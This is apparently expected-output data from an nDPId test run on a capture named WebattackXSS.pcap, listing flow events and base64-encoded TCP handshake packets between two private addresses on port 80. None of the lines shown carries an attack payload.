-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1499347271162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ilAAD4G26asEAABwKgKMth4AFDbDvpjAAAAAKACchCfRAAAAgQFtAQCCAoBOhBKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1499347271163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271163,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2HgbmHvT2w76ZKAScSAjFAAAAgQFtAQCCAoD4+HAAToQSgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1499347271163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347271163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06ipAAD4G262sEAABwKgKMth4AFDbDvpkG5h71IAQAOXCGwAAAQEICgE6EEoD4+HA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347272469,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wnhAAD4GA1isEAABwKgKMtiGAFBxpNPoAAAAAKACchAt1gAAAgQFtAQCCAoBOhGQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2IbhJKqDcaTT6aAScSC8IQAAAgQFtAQCCAoD4+MHAToRkAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":3,"flow_last_seen":1499347272470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347272470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wnlAAD4GA1+sEAABwKgKMtiGAFBxpNPp4SSqhIAQAOVbKAAAAQEICgE6EZED4+MH"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347273742,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347273742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8s+tAAD4GEeWsEAABwKgKMtiUAFBek6EkAAAAAKACchByXgAAAgQFtAQCCAoBOhLPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2JQ5PiSKXpOhJaAScSAtTAAAAgQFtAQCCAoD4+RFAToSzwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1499347273743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347273743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0s+xAAD4GEeysEAABwKgKMtiUAFBek6ElOT4ki4AQAOXMUwAAAQEICgE6Es8D4+RF"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347276278,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347276278,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RHhAAD4GgVisEAABwKgKMtiuAFAiVFExAAAAAKACchD7\/AAAAgQFtAQCCAoBOhVJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2K6190rBIlRRMqAScSARgAAAAgQFtAQCCAoD4+a\/AToVSQEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":3,"flow_last_seen":1499347276279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347276279,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RHlAAD4GgV+sEAABwKgKMtiuAFAiVFEytfdKwoAQAOWwhwAAAQEICgE6FUkD4+a\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347277521,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347277521,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMti8AFAjjgSGAAAAAKACchBGKgAAAgQFtAQCCAoBOhZ\/AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2LxShGbpI44Eh6AScSChwgAAAgQFtAQCCAoD4+f1AToWfwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMti8AFAjjgSHUoRm6oAQAOVAygAAAQEICgE6Fn8D4+f1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347280049,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347280049,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qXBAAD4GHGCsEAABwKgKMtjWAFBVFLGHAAAAAKACchBlEAAAAgQFtAQCCAoBOhj3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2NbA11G6VRSxiKAScSBlDAAAAgQFtAQCCAoD4+ptAToY9wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2606,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1499347280050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347280050,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qXFAAD4GHGesEAABwKgKMtjWAFBVFLGIwNdRu4AQAOUEEwAAAQEICgE6GPgD4+pt"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347281325,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347281325,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8klhAAD4GM3isEAABwKgKMtjkAFB+h4huAAAAAKACchBjaQAAAgQFtAQCCAoBOho2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ORl6oVWfoeIb6AScSCJdwAAAgQFtAQCCAoD4+usAToaNgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1499347281326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347281326,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kllAAD4GM3+sEAABwKgKMtjkAFB+h4hvZeqFV4AQAOUofwAAAQEICgE6GjYD4+us"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347282573,"flow_last_seen":1499347282573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1499347282573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mj1AAD4GK5OsEAABwKgKMtjyAFDR4YFTAAAAAKACchAV5AAAAgQFtAQCCAoBOhtuAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2PL\/kZOB0eGBVKAScSCS5gAAAgQFtAQCCAoD4+zlATobbgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347282574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mj5AAD4GK5qsEAABwKgKMtjyAFDR4YFU\/5GTgoAQAOUx7QAAAQEICgE6G28D4+zl"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 